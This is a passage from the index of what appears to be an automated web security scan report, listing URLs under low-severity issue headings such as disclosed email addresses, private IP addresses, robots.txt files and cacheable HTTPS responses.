26.263. http://www.technews.am/

26.264. http://www.techtalkz.com/

26.265. http://www.teensfilm.com/

26.266. http://www.tellmehowto.net/

26.267. http://www.thaimisc.com/

26.268. http://www.the-bikini.com/

26.269. http://www.the-clitoris.com/

26.270. http://www.thebeatles.com/

26.271. http://www.thefactsaboutfitness.com/

26.272. http://www.thefastresult.com/

26.273. http://www.thegreenhead.com/

26.274. http://www.thehothits.com/

26.275. http://www.thehunsearch.com/

26.276. http://www.theteachersguide.com/

26.277. http://www.thewallpapers.org/

26.278. http://www.ticketluck.com/

26.279. http://www.tjc.edu/

26.280. http://www.tomorrowsworld.org/

26.281. http://www.top-10-list.org/

26.282. http://www.top21sites.com/

26.283. http://www.tradingplaceamerica.com/

26.284. http://www.trilulilu.ro/

26.285. http://www.truzu.com/

26.286. http://www.tutorialized.com/

26.287. http://www.tvgrapevine.com/

26.288. http://www.tvmovie.de/

26.289. http://www.twitter-icons.net/

26.290. http://www.undisciplined-subs.com/

26.291. http://www.uni.cc/

26.292. http://www.unjiloma.info/

26.293. http://www.unlimitedgamer.net/

26.294. http://www.unscramble.net/

26.295. http://www.usa4sale.net/

26.296. http://www.usdebtclock.org/

26.297. http://www.usmortgagerelief.org/

26.298. http://www.usovernightcheck.com/

26.299. http://www.villagehatshop.com/

26.300. http://www.vocal.com/

26.301. http://www.watchfreetvonline.net/

26.302. http://www.web-ppc.com/

26.303. http://www.webme.com/

26.304. http://www.webstore.com/

26.305. http://www.whiskeyclips.com/

26.306. http://www.worldnewstwo.com/

26.307. http://www.worldtvpc.com/

26.308. http://www.wponew.com/

26.309. http://www.wrestlezone.com/

26.310. http://www.wwmt.com/

26.311. http://www.xbox360iso.com/

26.312. http://www.yeahbaby.com/

26.313. http://www.ymlp44.com/

26.314. http://www.yng.me/

27. Email addresses disclosed

27.1. http://ads.adbrite.com/adserver/behavioral-data/8201

27.2. http://ads.adbrite.com/adserver/behavioral-data/8201

27.3. http://ads.adbrite.com/adserver/vdi/762701

27.4. http://ads2.adbrite.com/v0/ad

27.5. http://ads2.adbrite.com/v0/ad

27.6. http://cdn.js-kit.com/scripts/comments.js

27.7. http://insurancenewsnet.com/styles/maintest.css

27.8. http://www.agingass.com/favicon.ico

27.9. http://www.corp.att.com/attsearch/sayt/search-as-you-type.js

27.10. http://www.cosmeticscop.com/favicon.ico

27.11. http://www.crankyape.com/

27.12. http://www.crankyape.com/favicon.ico

27.13. http://www.crankyape.com/javascripts/prototype.js

27.14. http://www.crankyape.com/javascripts/validation.js

27.15. https://www.crankyape.com/default.asp

27.16. https://www.crankyape.com/javascripts/prototype.js

27.17. https://www.crankyape.com/javascripts/validation.js

27.18. http://www.ec51.com/favicon.ico

27.19. http://www.girlfriendsecret.com/favicon.ico

27.20. http://www.google.com/uds/api/visualization/1.0/6b277f80b1043ed67e7dcd564353f3d8/default,geomap.I.js

27.21. http://www.headsets.com/favicon.ico

27.22. http://www.herematures.com/favicon.ico

27.23. http://www.heresquirt.com/favicon.ico

27.24. http://www.herestuds.tv/favicon.ico

27.25. http://www.hlsm.com/

27.26. http://www.hotwheelscollectors.com/HWCErrorPage.aspx

27.27. http://www.jacksonnewspapers.com/favicon.ico

27.28. http://www.japanator.com/elephant/login.phtml

27.29. http://www.japanator.com/elephant/signup.phtml

27.30. http://www.links4vids.com/favicon.ico

27.31. http://www.lsitools.com/favicon.ico

27.32. http://www.marrow.org/favicon.ico

27.33. http://www.mashastube.com/favicon.ico

27.34. http://www.momvictress.com/favicon.ico

27.35. http://www.mylovedpee.com/favicon.ico

27.36. http://www.mylovedspy.com/favicon.ico

27.37. https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CheckOut/Top.htm

27.38. http://www.questcomp.com/favicon.ico

27.39. http://www.rtvchannel.tv/favicon.ico

27.40. http://www.sadocabin.com/favicon.ico

27.41. http://www.sassieshop.com/favicon.ico

27.42. http://www.washingtonpost.com/wp-adv/jobs4/javascript/jobs_footer.js

27.43. http://www.washingtonpost.com/wp-adv/jobs4/javascript/jqModal.js

27.44. http://www.xhost.ro/favicon.ico

28. Private IP addresses disclosed

28.1. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US

28.2. http://static.ak.facebook.com/js/api_lib/v0.4/XdCommReceiver.js

28.3. http://www.bucadibeppo.com/favicon.ico

28.4. http://www.cupcakesandcashmere.com/favicon.ico

28.5. http://www.encomer.com/favicon.ico

28.6. http://www.facebook.com/extern/login_status.php

28.7. http://www.facebook.com/extern/login_status.php

28.8. http://www.facebook.com/extern/login_status.php

28.9. http://www.facebook.com/extern/login_status.php

28.10. http://www.facebook.com/plugins/like.php

28.11. http://www.gohawaii.com/favicon.ico

28.12. http://www.google.com/sdch/rU20-FBA.dct

28.13. http://www.homebusinessconnection.com/favicon.ico

28.14. http://www.latinamericancupid.com/favicon.ico

28.15. http://www.mochigames.com/favicon.ico

28.16. http://www.nflgridirongab.com/favicon.ico

28.17. http://www.onlocationvacations.com/favicon.ico

28.18. http://www.searchcactus.com/favicon.ico

28.19. http://www.sunshinereview.org/favicon.ico

28.20. http://www.sweepsadvantage.com/favicon.ico

29. Credit card numbers disclosed

29.1. http://csrc.nist.gov/publications/nistpubs/800-40-Ver2/SP800-40v2.pdf

29.2. http://www.bing.com/search

30. Robots.txt file

30.1. http://0.gravatar.com/avatar/a76bb4a499349279e0339b78885213c6

30.2. http://0.r.msn.com/

30.3. http://1.gravatar.com/avatar/31345061262d8fde4fa5256164900115

30.4. http://1051679.r.msn.com/

30.5. http://1188110.r.msn.com/

30.6. http://ad.doubleclick.net/adi/N3382.Yahoo/B5116950.16

30.7. http://ad.turn.com/server/pixel.htm

30.8. http://adx.g.doubleclick.net/pagead/adview

30.9. http://ajax.googleapis.com/ajax/static/modules/gviz/1.0/geomap/geomap.swf

30.10. http://b.scorecardresearch.com/b

30.11. http://bs.serving-sys.com/BurstingPipe/adServer.bs

30.12. http://c.statcounter.com/t.php

30.13. http://cdn.turn.com/server/ddc.htm

30.14. http://cm.g.doubleclick.net/pixel

30.15. http://csrc.nist.gov/publications/nistpubs/800-40-Ver2/SP800-40v2.pdf

30.16. http://d.chango.com/m/s/AdBrite

30.17. http://d1.openx.org/afr.php

30.18. http://digg.com/tools/diggthis.js

30.19. http://ds.serving-sys.com/BurstingCachedScripts//SBTemplates_2_2_7/StdBanner.js

30.20. http://googleads.g.doubleclick.net/pagead/ads

30.21. http://insurancenewsnet.com/article.aspx

30.22. http://loadm.exelator.com/load/

30.23. http://loadus.exelator.com/load/

30.24. http://map.media6degrees.com/orbserv/hbpix

30.25. http://media.washingtonpost.com/wp-srv/ad/wpni_generic_ad.js

30.26. http://metrics.washingtonpost.com/b/ss/wpnipostcomjobs/1/H.22.1/s96068415066692

30.27. http://n4403ad.doubleclick.net/adj/gn.japanator.com/home

30.28. http://na.decdna.net/n/61239/71938/EI6/x/e

30.29. http://news.yahoo.com/s/prweb/20110427/bs_prweb/prweb5276794

30.30. http://online.wsj.com/internal/ModTwitWSJMarkets.htm

30.31. http://pagead2.googlesyndication.com/pagead/imgad

30.32. http://pixel.invitemedia.com/admeld_sync

30.33. http://pixel.quantserve.com/pixel

30.34. http://pubads.g.doubleclick.net/gampad/ads

30.35. http://r.turn.com/server/pixel.htm

30.36. http://router.infolinks.com/gsd/1304319928277.0

30.37. http://s0.2mdn.net/807725/OSA_Save_It_728x90_NoXML_1loop_102210_v001.swf

30.38. http://segment-pixel.invitemedia.com/set_partner_uid

30.39. http://static.ak.facebook.com/js/api_lib/v0.4/XdCommReceiver.js

30.40. http://static.pulse360.com/blob/fb/6e141bc3_social_security_card.jpg

30.41. http://sync.mathtag.com/sync/img

30.42. http://tag.admeld.com/match

30.43. http://translate.googleapis.com/translate_a/l

30.44. http://us.bc.yahoo.com/b

30.45. http://usjobsresource.com/3

30.46. http://va.px.invitemedia.com/goog_imp

30.47. http://view.atdmt.com/ADO/view/284156785/direct

30.48. http://websiteprice.net/result/

30.49. http://widgets.digg.com/buttons/count

30.50. http://www.1728.com/favicon.ico

30.51. http://www.3fatchicks.com/favicon.ico

30.52. http://www.4tubehd.com/favicon.ico

30.53. http://www.6mmbr.com/favicon.ico

30.54. http://www.aacap.org/favicon.ico

30.55. http://www.abcpaydaydirect.com/favicon.ico

30.56. http://www.abdopain.com/favicon.ico

30.57. http://www.acadiaferry.com/favicon.ico

30.58. http://www.accesskansas.org/favicon.ico

30.59. http://www.aces.edu/favicon.ico

30.60. http://www.activexguide.com/favicon.ico

30.61. http://www.allelectronics.com/favicon.ico

30.62. http://www.alphashark.com/favicon.ico

30.63. http://www.amateurow.com/favicon.ico

30.64. http://www.americanbible.org/favicon.ico

30.65. http://www.americanclassifieds.com/favicon.ico

30.66. http://www.androidtablets.net/favicon.ico

30.67. http://www.anilinkz.com/favicon.ico

30.68. http://www.animatedknots.com/favicon.ico

30.69. http://www.anvato.com/favicon.ico

30.70. http://www.aol.co.uk/favicon.ico

30.71. http://www.apartmentsmart.com/favicon.ico

30.72. http://www.architecturaldigest.com/favicon.ico

30.73. http://www.argosy.edu/favicon.ico

30.74. http://www.arkive.org/favicon.ico

30.75. http://www.arktimes.com/favicon.ico

30.76. http://www.armchairgeneral.com/favicon.ico

30.77. http://www.ashtondrake.com/favicon.ico

30.78. http://www.assistedliving.com/favicon.ico

30.79. http://www.autotrafficavalanche.com/favicon.ico

30.80. http://www.awltovhc.com/image-4989411-10774308

30.81. http://www.bakingbites.com/favicon.ico

30.82. http://www.bankforeclosuressale.com/favicon.ico

30.83. http://www.bankonyourself.com/favicon.ico

30.84. http://www.barnstormers.com/favicon.ico

30.85. http://www.beauty-advices.com/favicon.ico

30.86. http://www.beefybulldog.com/favicon.ico

30.87. http://www.bestbridalprices.com/favicon.ico

30.88. http://www.blackanddeckerappliances.com/favicon.ico

30.89. http://www.bloodhero.com/favicon.ico

30.90. http://www.bluesplayer.co.uk/favicon.ico

30.91. http://www.bnbtobacco.com/favicon.ico

30.92. http://www.boatmotors.com/favicon.ico

30.93. http://www.bocajava.com/favicon.ico

30.94. http://www.bonhams.com/favicon.ico

30.95. http://www.boredpanda.com/favicon.ico

30.96. http://www.brookshirebrothers.com/favicon.ico

30.97. http://www.bucadibeppo.com/favicon.ico

30.98. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/

30.99. http://www.calculatorcat.com/favicon.ico

30.100. http://www.calvarywilliamsport.com/favicon.ico

30.101. http://www.camp-california.com/favicon.ico

30.102. http://www.capterra.com/favicon.ico

30.103. http://www.carfolio.com/favicon.ico

30.104. http://www.carsforagrand.com/favicon.ico

30.105. http://www.cato-at-liberty.org/favicon.ico

30.106. http://www.cbs8.com/favicon.ico

30.107. http://www.celebridiot.com/favicon.ico

30.108. http://www.celebtna.com/favicon.ico

30.109. http://www.celebzilla.com/favicon.ico

30.110. http://www.celiac.com/favicon.ico

30.111. http://www.cellreception.com/favicon.ico

30.112. http://www.cfigroup.com/favicon.ico

30.113. http://www.cheapism.com/favicon.ico

30.114. http://www.chicoer.com/favicon.ico

30.115. http://www.chrisbrownworld.com/favicon.ico

30.116. http://www.christnotes.org/favicon.ico

30.117. http://www.cirrusimage.com/favicon.ico

30.118. http://www.classfinders.com/favicon.ico

30.119. http://www.clickinks.com/favicon.ico

30.120. http://www.connectamarillo.com/favicon.ico

30.121. http://www.convergedirect.com/favicon.ico

30.122. http://www.copygator.com/favicon.ico

30.123. http://www.cosmeticscop.com/favicon.ico

30.124. http://www.countrytabs.com/favicon.ico

30.125. http://www.coupondad.net/favicon.ico

30.126. http://www.craftjr.com/favicon.ico

30.127. http://www.craigslistfoundation.org/favicon.ico

30.128. http://www.crankyape.com/favicon.ico

30.129. https://www.crankyape.com/default.asp

30.130. http://www.creativekidsathome.com/favicon.ico

30.131. http://www.creditunionsonline.com/favicon.ico

30.132. http://www.crengland.com/favicon.ico

30.133. http://www.cricbuzz.com/favicon.ico

30.134. http://www.cumminsforum.com/favicon.ico

30.135. http://www.cupcakesandcashmere.com/favicon.ico

30.136. http://www.dailynewnowa.com/favicon.ico

30.137. http://www.dallasguns.com/favicon.ico

30.138. http://www.dells.com/favicon.ico

30.139. http://www.developer.com/favicon.ico

30.140. http://www.dezeen.com/favicon.ico

30.141. http://www.diabetesdaily.com/favicon.ico

30.142. http://www.diabetesjournals.org/favicon.ico

30.143. http://www.docufide.com/favicon.ico

30.144. http://www.dotmed.com/favicon.ico

30.145. http://www.dotnetspark.com/favicon.ico

30.146. http://www.downloadroute.com/favicon.ico

30.147. http://www.downv.com/favicon.ico

30.148. http://www.drivewire.com/favicon.ico

30.149. http://www.droiddog.com/favicon.ico

30.150. http://www.drudge.com/favicon.ico

30.151. http://www.earlham.edu/favicon.ico

30.152. http://www.ec51.com/favicon.ico

30.153. http://www.edeals.com/favicon.ico

30.154. http://www.eders.com/favicon.ico

30.155. http://www.ehobbies.com/favicon.ico

30.156. http://www.elanaspantry.com/favicon.ico

30.157. http://www.encomer.com/favicon.ico

30.158. http://www.ephotozine.com/favicon.ico

30.159. http://www.etimspayments.com/favicon.ico

30.160. http://www.excellence-resorts.com/favicon.ico

30.161. http://www.expatforum.com/favicon.ico

30.162. http://www.express.co.uk/favicon.ico

30.163. http://www.ezboard.com/favicon.ico

30.164. http://www.ezisp.info/favicon.ico

30.165. http://www.ezjoblistings.com/favicon.ico

30.166. http://www.ezwebsitecounter.com/favicon.ico

30.167. http://www.facebook.com/plugins/like.php

30.168. http://www.facepinch.com/favicon.ico

30.169. http://www.faithclipart.com/favicon.ico

30.170. http://www.famegame.com/favicon.ico

30.171. http://www.fashionbombdaily.com/favicon.ico

30.172. http://www.febreze.com/favicon.ico

30.173. http://www.fedstats.gov/favicon.ico

30.174. http://www.feedagg.com/favicon.ico

30.175. http://www.fenomen-games.com/favicon.ico

30.176. http://www.fibromyalgia-symptoms.org/favicon.ico

30.177. http://www.final4ever.com/favicon.ico

30.178. http://www.firstload.de/favicon.ico

30.179. http://www.firstpeople.us/favicon.ico

30.180. http://www.flushotsusa.com/favicon.ico

30.181. http://www.foot-pain-explained.com/favicon.ico

30.182. http://www.forrabbits.eu/favicon.ico

30.183. http://www.fredflare.com/favicon.ico

30.184. http://www.freegamesnews.com/favicon.ico

30.185. http://www.freei.me/favicon.ico

30.186. http://www.freemooviesonline.com/favicon.ico

30.187. http://www.ftjcfx.com/image-4989411-10867633

30.188. http://www.fulltiltpoker.net/favicon.ico

30.189. http://www.gaf.com/favicon.ico

30.190. http://www.garden.org/favicon.ico

30.191. http://www.gastongazette.com/favicon.ico

30.192. http://www.gearfuse.com/favicon.ico

30.193. http://www.giantblackhooters.com/favicon.ico

30.194. http://www.girlscoutshop.com/favicon.ico

30.195. http://www.globelifeapplication.com/favicon.ico

30.196. http://www.gocrimson.com/favicon.ico

30.197. http://www.gohawaii.com/favicon.ico

30.198. http://www.goldpassport.com/favicon.ico

30.199. http://www.goodtoknow.co.uk/favicon.ico

30.200. http://www.google-analytics.com/__utm.gif

30.201. http://www.gov-auctions.org/favicon.ico

30.202. http://www.grannarium.com/favicon.ico

30.203. http://www.greenbuildingadvisor.com/favicon.ico

30.204. http://www.greensmoke.com/favicon.ico

30.205. http://www.guitarnoise.com/favicon.ico

30.206. http://www.gwawa.com/favicon.ico

30.207. http://www.hairyfilm.com/favicon.ico

30.208. http://www.hairysupreme.com/favicon.ico

30.209. http://www.halfpriceozarks.com/favicon.ico

30.210. http://www.hannaandersson.com/favicon.ico

30.211. http://www.harlandclarke.com/favicon.ico

30.212. http://www.hauteliving.com/favicon.ico

30.213. http://www.headsets.com/favicon.ico

30.214. http://www.healthination.com/favicon.ico

30.215. http://www.healthykids.org/favicon.ico

30.216. http://www.heartlandconnection.com/favicon.ico

30.217. http://www.heartspring.net/favicon.ico

30.218. http://www.hellobc.com/favicon.ico

30.219. http://www.hematologylibrary.org/favicon.ico

30.220. http://www.herematures.com/favicon.ico

30.221. http://www.heresquirt.com/favicon.ico

30.222. http://www.herestuds.tv/favicon.ico

30.223. http://www.herpesonline.org/favicon.ico

30.224. http://www.hiddengalleries.com/favicon.ico

30.225. http://www.highcharts.com/highslide/graphics/zoomout.cur

30.226. http://www.highspeedinternet.com/favicon.ico

30.227. http://www.hittracker.org/favicon.ico

30.228. http://www.hlsm.com/

30.229. http://www.homebusinessconnection.com/favicon.ico

30.230. http://www.hot18teens.com/favicon.ico

30.231. http://www.hotelgrandpacific.com/favicon.ico

30.232. http://www.hotspotshield.com/favicon.ico

30.233. http://www.howitshouldhaveended.com/favicon.ico

30.234. http://www.hudhouses.com/favicon.ico

30.235. http://www.hyperhistory.net/favicon.ico

30.236. http://www.ibegin.com/weather/weather_widget.php

30.237. http://www.icd9data.com/favicon.ico

30.238. http://www.icomamerica.com/favicon.ico

30.239. http://www.idealwifes.com/favicon.ico

30.240. http://www.igl.net/favicon.ico

30.241. http://www.ilmeteo.it/favicon.ico

30.242. http://www.index.com/favicon.ico

30.243. http://www.info.org.il/favicon.ico

30.244. http://www.inosmi.ru/favicon.ico

30.245. http://www.iptv.org/favicon.ico

30.246. http://www.irishfest.com/favicon.ico

30.247. http://www.itracks.com/favicon.ico

30.248. http://www.jacksonnewspapers.com/favicon.ico

30.249. http://www.jacksonsun.com/favicon.ico

30.250. http://www.javaworld.com/favicon.ico

30.251. http://www.jhoos.com/favicon.ico

30.252. http://www.jmu.edu/favicon.ico

30.253. http://www.jobsahoy.net/favicon.ico

30.254. http://www.journalstandard.com/favicon.ico

30.255. http://www.jpfun.com/favicon.ico

30.256. http://www.keds.com/favicon.ico

30.257. http://www.kellehampton.com/favicon.ico

30.258. http://www.kens5.com/favicon.ico

30.259. http://www.kingpayday.net/favicon.ico

30.260. http://www.knowledgerush.com/favicon.ico

30.261. http://www.knowyourmobile.com/favicon.ico

30.262. http://www.kobobooks.com/favicon.ico

30.263. http://www.kottke.org/favicon.ico

30.264. http://www.ksrevenue.org/favicon.ico

30.265. http://www.kxii.com/favicon.ico

30.266. http://www.lacetoleather.com/favicon.ico

30.267. http://www.latingossip.com/favicon.ico

30.268. http://www.lavalife.com/favicon.ico

30.269. http://www.ldoceonline.com/favicon.ico

30.270. http://www.lduhtrp.net/image-4989411-10765500

30.271. http://www.lee.net/favicon.ico

30.272. http://www.lenox.com/favicon.ico

30.273. http://www.leo.org/favicon.ico

30.274. http://www.libertytax.com/favicon.ico

30.275. http://www.livedash.com/favicon.ico

30.276. http://www.livingonadime.com/favicon.ico

30.277. http://www.ljseek.com/favicon.ico

30.278. http://www.llewellyn.com/favicon.ico

30.279. http://www.localedge.com/favicon.ico

30.280. http://www.localism.com/favicon.ico

30.281. http://www.localtvllc.com/favicon.ico

30.282. http://www.longislandexchange.com/favicon.ico

30.283. http://www.looktothestars.org/favicon.ico

30.284. http://www.lowerhealthquotes.com/favicon.ico

30.285. http://www.lowerpressure.com/favicon.ico

30.286. http://www.lsureveille.com/favicon.ico

30.287. http://www.lttmlistings.com/favicon.ico

30.288. http://www.luckyasiangirls.com/favicon.ico

30.289. http://www.lyred.com/favicon.ico

30.290. http://www.mangastream.com/favicon.ico

30.291. http://www.map24.com/favicon.ico

30.292. http://www.mappy.com/favicon.ico

30.293. http://www.marketintellisearch.com/favicon.ico

30.294. http://www.marrow.org/favicon.ico

30.295. http://www.mdconsult.com/favicon.ico

30.296. http://www.megajackpot4life.com/favicon.ico

30.297. http://www.mental-health-matters.com/favicon.ico

30.298. http://www.mexconnect.com/favicon.ico

30.299. http://www.michiganmessenger.com/favicon.ico

30.300. http://www.microchip.com/favicon.ico

30.301. http://www.mihomepaper.com/favicon.ico

30.302. http://www.milwaukee.gov/favicon.ico

30.303. http://www.moroccanoil.com/favicon.ico

30.304. http://www.mrsdash.com/favicon.ico

30.305. http://www.mst.edu/favicon.ico

30.306. http://www.mumsnet.com/favicon.ico

30.307. http://www.muschealth.com/favicon.ico

30.308. http://www.museum.tv/favicon.ico

30.309. http://www.musicoutfitters.com/favicon.ico

30.310. http://www.myfoxboston.com/favicon.ico

30.311. http://www.myfoxchicago.com/favicon.ico

30.312. http://www.mylearningplan.com/favicon.ico

30.313. http://www.mylovedpee.com/favicon.ico

30.314. http://www.mylovedspy.com/favicon.ico

30.315. http://www.mynews.in/favicon.ico

30.316. http://www.mypearsonstore.com/favicon.ico

30.317. http://www.myregistry.com/favicon.ico

30.318. http://www.myrtlebeach-resorts.com/favicon.ico

30.319. http://www.mytattoogallery.com/favicon.ico

30.320. http://www.mytelus.com/favicon.ico

30.321. http://www.nartube.net/favicon.ico

30.322. http://www.ncgenweb.us/favicon.ico

30.323. http://www.ndsmcobserver.com/favicon.ico

30.324. http://www.newenglandmoves.com/favicon.ico

30.325. http://www.nflgridirongab.com/favicon.ico

30.326. http://www.nhregister.com/favicon.ico

30.327. http://www.nikonrumors.com/favicon.ico

30.328. http://www.ntb.com/favicon.ico

30.329. http://www.numerologist.com/favicon.ico

30.330. http://www.nursing-jobs.us/favicon.ico

30.331. http://www.onlinemoneystash.com/favicon.ico

30.332. http://www.onlinetextmessage.com/favicon.ico

30.333. http://www.onlocationvacations.com/favicon.ico

30.334. http://www.organicgardening.com/favicon.ico

30.335. http://www.orlandojobs.com/favicon.ico

30.336. http://www.oshkosh365.org/favicon.ico

30.337. http://www.oshkoshbgosh.com/favicon.ico

30.338. http://www.ourmidland.com/favicon.ico

30.339. http://www.ourprayer.org/favicon.ico

30.340. http://www.outdoor-babes.com/favicon.ico

30.341. http://www.outdoorjp.com/favicon.ico

30.342. http://www.oxfamamerica.org/favicon.ico

30.343. http://www.pal-item.com/favicon.ico

30.344. http://www.pashnit.com/favicon.ico

30.345. http://www.patdollard.com/favicon.ico

30.346. http://www.pdga.com/favicon.ico

30.347. http://www.pearljam.com/favicon.ico

30.348. http://www.pearsoncmg.com/favicon.ico

30.349. http://www.petri.co.il/favicon.ico

30.350. http://www.pfaw.org/favicon.ico

30.351. http://www.philabundance.org/favicon.ico

30.352. http://www.pinkemo.com/favicon.ico

30.353. http://www.playmobilusa.com/favicon.ico

30.354. http://www.plccenter.com/favicon.ico

30.355. http://www.plosone.org/favicon.ico

30.356. http://www.popdose.com/favicon.ico

30.357. http://www.popular-wedding-songs.com/favicon.ico

30.358. http://www.ppld.org/favicon.ico

30.359. http://www.pregnancyguideonline.com/favicon.ico

30.360. http://www.prontotech.com/favicon.ico

30.361. http://www.ptla.org/favicon.ico

30.362. http://www.pumpkinlabs.com/ads/ad-geo-contextual.php

30.363. http://www.qbike.com/favicon.ico

30.364. http://www.questcomp.com/favicon.ico

30.365. http://www.quiltingboard.com/favicon.ico

30.366. http://www.quizrocket.com/favicon.ico

30.367. http://www.rappahannock.edu/favicon.ico

30.368. http://www.rc-airplane-world.com/favicon.ico

30.369. http://www.redcounty.com/favicon.ico

30.370. http://www.reelseo.com/favicon.ico

30.371. http://www.rezstreamsynch.net/favicon.ico

30.372. http://www.riu.com/favicon.ico

30.373. http://www.rnbxclusive.com/favicon.ico

30.374. http://www.ronnies.com/micro.htm

30.375. http://www.ronniesmailorder.com/fiche_select.asp

30.376. http://www.rtsports.com/favicon.ico

30.377. http://www.ryder.com/favicon.ico

30.378. http://www.s10forum.com/favicon.ico

30.379. http://www.sailboatlistings.com/favicon.ico

30.380. http://www.schnucks.com/favicon.ico

30.381. http://www.schoolsk-12.com/favicon.ico

30.382. http://www.sdge.com/favicon.ico

30.383. http://www.seiu.org/favicon.ico

30.384. http://www.seoq.com/webstatshq/www.onlinemicrofiche.com

30.385. http://www.shareup.com/favicon.ico

30.386. http://www.sheddaquarium.org/favicon.ico

30.387. http://www.shoppingsage.info/favicon.ico

30.388. http://www.slotocash.com/favicon.ico

30.389. http://www.smoker-cooking.com/favicon.ico

30.390. http://www.snapdealz.com/favicon.ico

30.391. http://www.softlist.net/favicon.ico

30.392. http://www.songs-lyrics.net/favicon.ico

30.393. http://www.spirit-of-metal.com/favicon.ico

30.394. http://www.stoik.com/favicon.ico

30.395. http://www.studylight.org/favicon.ico

30.396. http://www.style-hair-magazine.com/favicon.ico

30.397. http://www.superhost.pl/favicon.ico

30.398. http://www.support.com/favicon.ico

30.399. http://www.sweepsadvantage.com/favicon.ico

30.400. http://www.sythe.org/favicon.ico

30.401. http://www.tacklewarehouse.com/favicon.ico

30.402. http://www.techonlife.com/favicon.ico

30.403. http://www.techtalkz.com/favicon.ico

30.404. http://www.teensfilm.com/favicon.ico

30.405. http://www.tellmehowto.net/favicon.ico

30.406. http://www.tenniswarehouse.com/favicon.ico

30.407. http://www.thaimisc.com/favicon.ico

30.408. http://www.the-bikini.com/favicon.ico

30.409. http://www.the-clitoris.com/favicon.ico

30.410. http://www.theday.com/favicon.ico

30.411. http://www.thefactsaboutfitness.com/favicon.ico

30.412. http://www.thefordstory.com/favicon.ico

30.413. http://www.thehothits.com/favicon.ico

30.414. http://www.thehunsearch.com/favicon.ico

30.415. http://www.theteachersguide.com/favicon.ico

30.416. http://www.ticketluck.com/favicon.ico

30.417. http://www.timezoneconverter.com/favicon.ico

30.418. http://www.tomorrowsworld.org/favicon.ico

30.419. http://www.top-10-list.org/favicon.ico

30.420. http://www.top21sites.com/favicon.ico

30.421. http://www.toyotacertified.com/favicon.ico

30.422. http://www.tqlkg.com/image-4989411-10732263

30.423. http://www.tradingplaceamerica.com/favicon.ico

30.424. http://www.traditionalmusic.co.uk/favicon.ico

30.425. http://www.travel-library.com/favicon.ico

30.426. http://www.trilulilu.ro/favicon.ico

30.427. http://www.trincoll.edu/favicon.ico

30.428. http://www.truzu.com/favicon.ico

30.429. http://www.tutorialized.com/favicon.ico

30.430. http://www.tva.gov/favicon.ico

30.431. http://www.tvgrapevine.com/favicon.ico

30.432. http://www.tvmovie.de/favicon.ico

30.433. http://www.twopair.com/favicon.ico

30.434. http://www.uloric.com/favicon.ico

30.435. http://www.undisciplined-subs.com/favicon.ico

30.436. http://www.uni.cc/favicon.ico

30.437. http://www.uni.edu/favicon.ico

30.438. http://www.unlimitedgamer.net/favicon.ico

30.439. http://www.unrealitymag.com/favicon.ico

30.440. http://www.unscramble.net/favicon.ico

30.441. http://www.usa4sale.net/favicon.ico

30.442. http://www.usahockey.com/favicon.ico

30.443. http://www.usedpartscentral.com/favicon.ico

30.444. http://www.usjobsources.com/MjMwODJ8NzA2N3wxMjYwNjY3fHYy/r

30.445. http://www.vhlcentral.com/favicon.ico

30.446. http://www.villagehatshop.com/favicon.ico

30.447. http://www.virtual-hairstyles.com/favicon.ico

30.448. http://www.vocal.com/favicon.ico

30.449. http://www.voiceofsandiego.org/favicon.ico

30.450. http://www.walthers.com/favicon.ico

30.451. http://www.washingtonpost.com/wl/jobs/home

30.452. http://www.wcpss.net/favicon.ico

30.453. http://www.webme.com/favicon.ico

30.454. http://www.webstore.com/favicon.ico

30.455. http://www.weedsthatplease.com/favicon.ico

30.456. http://www.westjet.com/favicon.ico

30.457. http://www.whiskeyclips.com/favicon.ico

30.458. http://www.whosampled.com/favicon.ico

30.459. http://www.wirelessadvisor.com/favicon.ico

30.460. http://www.wmms.com/favicon.ico

30.461. http://www.womansdivorce.com/favicon.ico

30.462. http://www.worldnewstwo.com/favicon.ico

30.463. http://www.worldtvpc.com/favicon.ico

30.464. http://www.wpsdlocal6.com/favicon.ico

30.465. http://www.wretch.cc/favicon.ico

30.466. http://www.wsfa.com/favicon.ico

30.467. http://www.wtoc.com/favicon.ico

30.468. http://www.wtrf.com/favicon.ico

30.469. http://www.wtuber.com/favicon.ico

30.470. http://www.wwmt.com/favicon.ico

30.471. http://www.xhost.ro/favicon.ico

30.472. http://www.xilisoft.com/favicon.ico

30.473. http://www.yeahbaby.com/favicon.ico

30.474. http://www.ymlp44.com/favicon.ico

30.475. http://www.yorku.ca/favicon.ico

30.476. http://www.youneek.com/favicon.ico

31. Cacheable HTTPS response

31.1. https://www.crankyape.com/AJAXWebServices/geographicServices.asmx/getCountries

31.2. https://www.crankyape.com/AJAXWebServices/geographicServices.asmx/getStates

31.3. https://www.crankyape.com/member/

31.4. https://www.crankyape.com/member/registration.aspx

31.5. https://www.onlinemicrofiche.com/Electronicpartsfinder/dealerinfo/DealerInfo.asp

31.6. https://www.onlinemicrofiche.com/WPS/shoppingcart/Shoppingcart/ProcessOrder.asp

31.7. https://www.onlinemicrofiche.com/WPS/shoppingcart/checkout/Navigation.asp

31.8. https://www.onlinemicrofiche.com/WPS/shoppingcart/checkout/Top.htm

31.9. https://www.onlinemicrofiche.com/WPS/shoppingcart/checkout/Viewcart.asp

31.10. https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CheckOut/Navigation.asp

31.11. https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CheckOut/Top.htm

31.12. https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CheckOut/Viewcart.asp

31.13. https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/Shoppingcart/ProcessOrder.asp

32. Multiple content types specified

32.1. http://www.convergedirect.com/favicon.ico

32.2. http://www.procuts.com/favicon.ico

33. HTML does not specify charset

33.1. http://ad.doubleclick.net/adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.11

33.2. http://ad.doubleclick.net/adi/N3382.Yahoo/B5116950.16

33.3. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32

33.4. http://ad.yieldmanager.com/iframe3

33.5. http://ads-vrx.adbrite.com/adserver/display_iab_ads

33.6. http://bs.serving-sys.com/BurstingPipe/adServer.bs

33.7. http://content.pulse360.com/CC4A2528-2176-11DF-BB34-61FFECADD848

33.8. http://danilolee.com/cgi-sys/suspendedpage.cgi

33.9. http://loadus.exelator.com/load/net.php

33.10. http://online.wsj.com/internal/ModTwitWSJMarkets.htm

